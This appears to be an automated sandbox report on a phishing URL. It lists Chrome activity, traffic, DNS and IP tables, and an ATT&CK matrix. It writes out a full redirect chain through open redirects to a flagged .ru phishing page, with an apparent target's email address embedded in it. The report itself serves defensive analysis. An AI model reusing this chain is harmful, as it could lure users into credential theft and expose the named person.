    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: classification engineClassification label: mal60.phis.win@23/77@42/16
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1948,i,14907547399689910483,310320339448352064,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1948,i,14907547399689910483,310320339448352064,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://y7.novenef.ru/Lj9e/100%Avira URL Cloudphishing
    https://urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru/ItjnOrQFuqAwfUMRPcpijOHMGRTPXRGRZFXLIWPJUHDRHTAXAFCEEPIPRAIGIVWFSPLFFYUPBMOFHWRLVOOE0%Avira URL Cloudsafe
    https://y7.novenef.ru/favicon.ico100%Avira URL Cloudphishing
    http://yesmotoring.com.sg/favicon.ico0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      elsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.com
      52.48.213.169
      truefalse
        high
        code.jquery.com
        151.101.2.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                sni1gl.wpc.omegacdn.net
                152.199.21.175
                truefalse
                  high
                  www.google.com
                  216.58.206.68
                  truefalse
                    high
                    yesmotoring.com.sg
                    103.15.234.11
                    truefalse
                      unknown
                      y7.novenef.ru
                      104.21.64.1
                      truetrue
                        unknown
                        www.google.co.nz
                        142.250.185.67
                        truefalse
                          high
                          urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru
                          104.21.42.208
                          truefalse
                            high
                            www.office.com
                            unknown
                            unknownfalse
                              high
                              t1.a.editions-legislatives.fr
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  identity.nel.measure.office.net
                                  unknown
                                  unknownfalse
                                    high
                                    login.microsoftonline.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/false
                                        high
                                        https://y7.novenef.ru/Lj9e/true
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                          high
                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                            high
                                            https://www.google.co.nz/amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=false
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe2912ef9947ce2/1736238432173/8Vh9ItncyZEQ6Vpfalse
                                                high
                                                https://urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru/ItjnOrQFuqAwfUMRPcpijOHMGRTPXRGRZFXLIWPJUHDRHTAXAFCEEPIPRAIGIVWFSPLFFYUPBMOFHWRLVOOEfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2912ef9947ce2&lang=autofalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                    high
                                                    https://y7.novenef.ru/favicon.icofalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mqfalse
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fe2912ef9947ce2/1736238432174/6ed637ccacc930e47539890c4d5436892bfe5524ad06ce89a486f26a8eed1694/fptNhJZvCBcxF8qfalse
                                                          high
                                                          http://yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=false
                                                            unknown
                                                            https://www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogofalse
                                                              high
                                                              https://y7.novenef.ru/Lj9e/#Aphil.lessard@modula.comfalse
                                                                unknown
                                                                https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogofalse
                                                                  unknown
                                                                  http://yesmotoring.com.sg/favicon.icofalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://login.microsoftonline.comchromecache_88.1.dr, chromecache_96.1.drfalse
                                                                    high
                                                                    https://login.windows-ppe.netchromecache_88.1.dr, chromecache_96.1.drfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.18.94.41
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.21.64.1
                                                                      y7.novenef.ruUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      151.101.130.137
                                                                      unknownUnited States
                                                                      54113FASTLYUSfalse
                                                                      104.21.42.208
                                                                      urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ruUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      35.190.80.1
                                                                      a.nel.cloudflare.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      52.48.213.169
                                                                      elsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.comUnited States
                                                                      16509AMAZON-02USfalse
                                                                      103.15.234.11
                                                                      yesmotoring.com.sgSingapore
                                                                      58621VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGfalse
                                                                      142.250.185.67
                                                                      www.google.co.nzUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.17.24.14
                                                                      cdnjs.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.185.68
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.18.95.41
                                                                      challenges.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      216.58.206.68
                                                                      www.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      151.101.2.137
                                                                      code.jquery.comUnited States
                                                                      54113FASTLYUSfalse
                                                                      239.255.255.250
                                                                      unknownReserved
                                                                      unknownunknownfalse
                                                                      104.17.25.14
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      IP
                                                                      192.168.2.16
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1585189
                                                                      Start date and time:2025-01-07 09:26:32 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 3m 27s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                      Sample URL:https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:13
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal60.phis.win@23/77@42/16
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 142.250.185.238, 142.250.185.163, 108.177.15.84, 172.217.16.142, 142.250.186.78, 142.250.181.238, 142.250.185.78, 20.190.160.20, 40.126.32.133, 40.126.32.138, 40.126.32.76, 20.190.160.22, 40.126.32.134, 40.126.32.72, 40.126.32.68, 172.217.16.206, 13.107.6.156, 20.190.159.73, 20.190.159.75, 40.126.31.67, 20.190.159.0, 20.190.159.68, 20.190.159.4, 20.190.159.64, 40.126.31.71, 20.190.159.71, 40.126.31.69, 142.250.186.42, 142.250.186.170, 142.250.186.138, 172.217.16.202, 142.250.185.74, 142.250.181.234, 216.58.206.42, 172.217.18.10, 142.250.74.202, 142.250.185.234, 172.217.16.138, 216.58.206.74, 142.250.186.106, 142.250.184.202, 142.250.184.234, 172.217.18.106, 13.69.239.74, 20.50.73.11, 142.250.74.206, 142.250.185.174, 142.250.186.99, 172.217.18.14, 2.16.168.197, 2.16.168.221, 142.250.186.46, 20.109.210.53, 184.28.90.27, 13.107.246.45
                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdneu06.northeurope.cloudapp.azure.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, redirector.gvt1.com, login.live.com, update.googleapis.com, onedscolprdneu07.northeurope.cloudapp.azure.com, login.mso.msidentity.com, clients1.google.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.ak.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.akadns.net, b-0004.b-msedge.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo
                                                                      No simulations
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 07:27:03 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2673
                                                                      Entropy (8bit):3.9845977853965953
                                                                      Encrypted:false
                                                                      SSDEEP:48:8Kd0T4AjHRidAKZdA1FehwiZUklqeh0y+3:8JvHry
                                                                      MD5:3EDA19DF693687FA464C657F373C6E74
                                                                      SHA1:4FCB3A004360074081D4E2A0B0C3343B703660A3
                                                                      SHA-256:D60ED70D759F177C255277AE608416F58C79D2D603065C6AC5C9FEA11E3B9BCB
                                                                      SHA-512:74BFA25D52B2762F1F1A00CD85B0E57DFBED59F22A6BE94EBAAD36AA47251F1BFBB3615AF437B0A0F39E57F1470E0947716DF5240E0125981F6315A5ACBF0867
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:L..................F.@.. ...$+.,.........`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZUC....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'ZaC....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'ZaC....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'ZaC..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'ZbC...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 07:27:03 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2675
                                                                      Entropy (8bit):3.999935518782508
                                                                      Encrypted:false
                                                                      SSDEEP:48:8Wd0T4AjHRidAKZdA1seh/iZUkAQkqehby+2:8tvx9QKy
                                                                      MD5:F40234919EB1473BF09C00BB7DD83E53
                                                                      SHA1:26FB03126D2F2B98FFC6EDFE44E05451D56B5D26
                                                                      SHA-256:CD7770D6486FEAB34FC80F05EC8B86ED71D9BBAE21A999539E53496337E5A775
                                                                      SHA-512:5B3F2CD75CD3DA72475BFD85D7B53D5A08DEA0CC5AEC90994C57994D641E9E85404CE48EA3C36F8C80A35355E9BB5F2B12BB6961347D2F047231B8FB302078DE
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:L..................F.@.. ...$+.,.........`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZUC....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'ZaC....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'ZaC....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'ZaC..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'ZbC...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2689
